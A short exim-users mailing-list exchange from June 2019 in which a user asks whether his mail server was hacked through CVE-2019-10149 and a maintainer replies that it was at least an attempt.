## Please use the Wiki with this list - http://wiki.exim.org/


Re: [exim] CVE-2019-10149: already vulnerable ?

2019-06-21 Thread Benoît PELISSIER via Exim-users

My version is updated so they cant, but they tried ?

Benoît

Le 21/06/2019 à 15:20, Jeremy Harris via Exim-users a écrit :

On 21/06/2019 08:00, Benoît PELISSIER via Exim-users wrote:

My mail system ha been hacked ?


At the very least an appempt to do so


CVE-2019-10149 ?


Yes

<>-- 
## List details at https://lists.exim.org/mailman/listinfo/exim-users
## Exim details at http://www.exim.org/
## Please use the Wiki with this list - http://wiki.exim.org/


Re: [exim] CVE-2019-10149: already vulnerable ?

2019-06-21 Thread Jeremy Harris via Exim-users
On 21/06/2019 08:00, Benoît PELISSIER via Exim-users wrote:
> My mail system ha been hacked ?

At the very least an appempt to do so

> CVE-2019-10149 ?

Yes

-- 
Cheers,
  Jeremy

-- 
## List details at https://lists.exim.org/mailman/listinfo/exim-users
## Exim details at http://www.exim.org/
## Please use the Wiki with this list - http://wiki.exim.org/